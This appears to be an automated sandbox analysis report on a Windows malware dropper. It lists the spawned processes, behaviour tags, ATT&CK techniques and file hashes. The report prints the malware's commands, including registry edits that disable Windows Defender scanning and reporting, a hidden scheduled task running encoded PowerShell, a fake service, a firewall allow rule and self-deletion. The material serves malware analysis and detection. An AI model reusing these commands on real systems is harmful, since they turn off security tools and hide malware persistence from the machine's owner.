C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\8yNuAlksxt9ERCQBLnTf5R7s.exe"C:\Users\Admin\Documents\8yNuAlksxt9ERCQBLnTf5R7s.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe"C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 61TM8q9Z9OdxN8H1Dz9MigvY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 61TM8q9Z9OdxN8H1Dz9MigvY.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\3C5chxgmdIM7FCOvWctXQCVO.exe"C:\Users\Admin\Documents\3C5chxgmdIM7FCOvWctXQCVO.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#614⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 9484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 9564⤵
- Program crash
-
C:\Users\Admin\Documents\PGrgYrmjIUuPTUnxq9jnhp_9.exe"C:\Users\Admin\Documents\PGrgYrmjIUuPTUnxq9jnhp_9.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\ZQfEwTalmYFjc4TLiZPAYIzG.exe"C:\Users\Admin\Documents\ZQfEwTalmYFjc4TLiZPAYIzG.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Documents\thSjL5N0VAxIgAXhHP6f09aM.exe"C:\Users\Admin\Documents\thSjL5N0VAxIgAXhHP6f09aM.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\QwtjZdfAu0PgtINFi4Nvj66n.exe"C:\Users\Admin\Documents\QwtjZdfAu0PgtINFi4Nvj66n.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\AMmh7Hp1kuB7JaUBXLLtucDo.exe"C:\Users\Admin\Documents\AMmh7Hp1kuB7JaUBXLLtucDo.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe"C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exeC:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\gcZHL1UuAAZsKYs16SSxBhPd.exe"C:\Users\Admin\Documents\gcZHL1UuAAZsKYs16SSxBhPd.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\HxMqtYZIUVTsFBvCoEA3Pki_.exe"C:\Users\Admin\Documents\HxMqtYZIUVTsFBvCoEA3Pki_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSD6B6.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE60.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkGvnlPWW" /SC once /ST 00:45:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkGvnlPWW"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkGvnlPWW"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\EWdrJPC.exe\" j6 /site_id 525403 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ftGHhdmXOThAq7aPthuyzF9H.exe"C:\Users\Admin\Documents\ftGHhdmXOThAq7aPthuyzF9H.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\dada.exe"C:\Users\Admin\AppData\Local\Temp\dada.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jcngxsb\4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\obxzwabi.exe" C:\Windows\SysWOW64\jcngxsb\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create jcngxsb binPath= "C:\Windows\SysWOW64\jcngxsb\obxzwabi.exe /d\"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe\"" type= own start= auto DisplayName= "wifi support"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description jcngxsb "wifi internet conection"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jcngxsb4⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
-
C:\Users\Admin\bkkimcju.exe"C:\Users\Admin\bkkimcju.exe" /d"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\irrptjqb.exe" C:\Windows\SysWOW64\jcngxsb\5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config jcngxsb binPath= "C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe /d\"C:\Users\Admin\bkkimcju.exe\""5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jcngxsb5⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 12205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 10484⤵
- Program crash
-
C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe"C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe"C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 12244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 12324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 13044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 13244⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "k3wOXzGlwzQprfZ7dKwqK6sN.exe" /f & erase "C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "k3wOXzGlwzQprfZ7dKwqK6sN.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 14604⤵
- Program crash
-
C:\Users\Admin\Documents\4E1sEd5y60BTJLCX9pPJHvn6.exe"C:\Users\Admin\Documents\4E1sEd5y60BTJLCX9pPJHvn6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\z63VCPkRi8gB3YlO5uw17UaM.exe"C:\Users\Admin\Documents\z63VCPkRi8gB3YlO5uw17UaM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 4684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 33201⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3340 -ip 33401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3320 -ip 33201⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5532 -ip 55321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5720 -ip 57201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5680 -ip 56801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5408 -ip 54081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5600 -ip 56001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6400 -ip 64001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5532 -ip 55321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5720 -ip 57201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5680 -ip 56801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5704 -ip 57041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5208 -ip 52081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5408 -ip 54081⤵
-
C:\Windows\SysWOW64\jcngxsb\irrptjqb.exeC:\Windows\SysWOW64\jcngxsb\irrptjqb.exe /d"C:\Users\Admin\bkkimcju.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 5722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5408 -ip 54081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7024 -ip 70241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5688 -ip 56881⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5688 -ip 56881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5688 -ip 56881⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3320 -ip 33201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3320 -ip 33201⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
2Disabling Security Tools
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751MD5
54e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751MD5
0e86fb9e283dbc80bcc69965d55bd261
SHA18dfba4823ebefadc04c245d373cf12d36a2bfbda
SHA2567e48cc77859fc3339d8bfad705f26ffed1be309f12b98e78b544ec71955e5d19
SHA512ec91e9b18a0af5d4ea738d36815fa54a4bdc8cdf9bd6c5e5fc0aeb8b63ace6b5510f8164ea23f4edb9871a6b85dae83630c8e6c815e7942746394451662c99f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
3b3ae2b28ae533bf89071e80738c60b3
SHA1339000c34cbaeced8672524882a69c2e7d87a95d
SHA256d8723fc8a20413de9be784f0903c3a1e663b482b6a192238aebc3c3fd096813a
SHA5125eee26d2d12e9169816d9a14e00972f93e1c6272e6c3a427667a92ffe7bfb403bbbb2269aedba57969473b98bc807f2e5c7f52635d8ce54d03c62aa2bec7a6a6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoMD5
e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Temp\CC4F.tmpMD5
4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1e16506f662dc92023bf82def1d621497c8ab5890
SHA256767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA5129da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
be0640d507c35efdb2fddb336643e6b6
SHA15ff26d9dcbe4ea14b02b33f31594cb2618d76257
SHA2562e3a93242b6af222b8df4413a4e6e8519114331124c2367e7604f00984835dd6
SHA512321e61479885fe5b160fb175f109cbf83295f8b5b597eeaca08075907d3bdea32206d4ffa31b9cf0d4287e85d71cb0bed94f7f6a1454ca499178c35209c6ec77
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
be0640d507c35efdb2fddb336643e6b6
SHA15ff26d9dcbe4ea14b02b33f31594cb2618d76257
SHA2562e3a93242b6af222b8df4413a4e6e8519114331124c2367e7604f00984835dd6
SHA512321e61479885fe5b160fb175f109cbf83295f8b5b597eeaca08075907d3bdea32206d4ffa31b9cf0d4287e85d71cb0bed94f7f6a1454ca499178c35209c6ec77
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
6f247a83bc3a67c637a5ebe91fde109a
SHA1827e9e2717e04f5768da944bc87386d03fe8c732
SHA2561558f756b05cbfd9a303da3129a68cf7aeab568cc58388180d979a785296c7dd
SHA512845cb5a95fecd0aac13aa4c1e47829ba84d1329ff9c9436d673f97da52a12c6e3c802c65af95d25eaae6f3f008a8fa557df9b95017ee468d72ed7e68d02284f4
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
6f247a83bc3a67c637a5ebe91fde109a
SHA1827e9e2717e04f5768da944bc87386d03fe8c732
SHA2561558f756b05cbfd9a303da3129a68cf7aeab568cc58388180d979a785296c7dd
SHA512845cb5a95fecd0aac13aa4c1e47829ba84d1329ff9c9436d673f97da52a12c6e3c802c65af95d25eaae6f3f008a8fa557df9b95017ee468d72ed7e68d02284f4
-
C:\Users\Admin\AppData\Local\Temp\Info.exeMD5
92acb4017f38a7ee6c5d2f6ef0d32af2
SHA11b932faf564f18ccc63e5dabff5c705ac30a61b8
SHA2562459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1
SHA512d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73
-
C:\Users\Admin\AppData\Local\Temp\Info.exeMD5
92acb4017f38a7ee6c5d2f6ef0d32af2
SHA11b932faf564f18ccc63e5dabff5c705ac30a61b8
SHA2562459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1
SHA512d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73
-
C:\Users\Admin\AppData\Local\Temp\Install.exeMD5
cd0df66b2728ee9d92f9bf40500bb0be
SHA11d220a56a915d3c2d4180336dcc0630321ee2080
SHA256e253ad2182d223ece4f604bea3590448b21a583e7c62a167bf58ad79150dc5e4
SHA51211d56171cf0a049d76978f4699cbc21ecd6468056eb5013d8b6a81809057aabe14827cc41b2986a44be21cdc8acab0488ce3c1c5fc2581148b7a226180e2c26a
-
C:\Users\Admin\AppData\Local\Temp\Install.exeMD5
cd0df66b2728ee9d92f9bf40500bb0be
SHA11d220a56a915d3c2d4180336dcc0630321ee2080
SHA256e253ad2182d223ece4f604bea3590448b21a583e7c62a167bf58ad79150dc5e4
SHA51211d56171cf0a049d76978f4699cbc21ecd6468056eb5013d8b6a81809057aabe14827cc41b2986a44be21cdc8acab0488ce3c1c5fc2581148b7a226180e2c26a
-
C:\Users\Admin\AppData\Local\Temp\Installation.exeMD5
6db938b22272369c0c2f1589fae2218f
SHA18279d75d704aaf9346e8f86df5aa1f2e8a734bb9
SHA256a3f4061d3d60ae5a3ee4a168f1bec3790e1927f77184915a821d1eade478677e
SHA512a83cae75c7d9f98e4841f1517ec6ea867731f3f3c52a2f12c372be01c7da0a53d458eadfc61309a906ed63c48ca80194ddf52a084044a20e8a2bd3679e492c31
-
C:\Users\Admin\AppData\Local\Temp\Installation.exeMD5
6db938b22272369c0c2f1589fae2218f
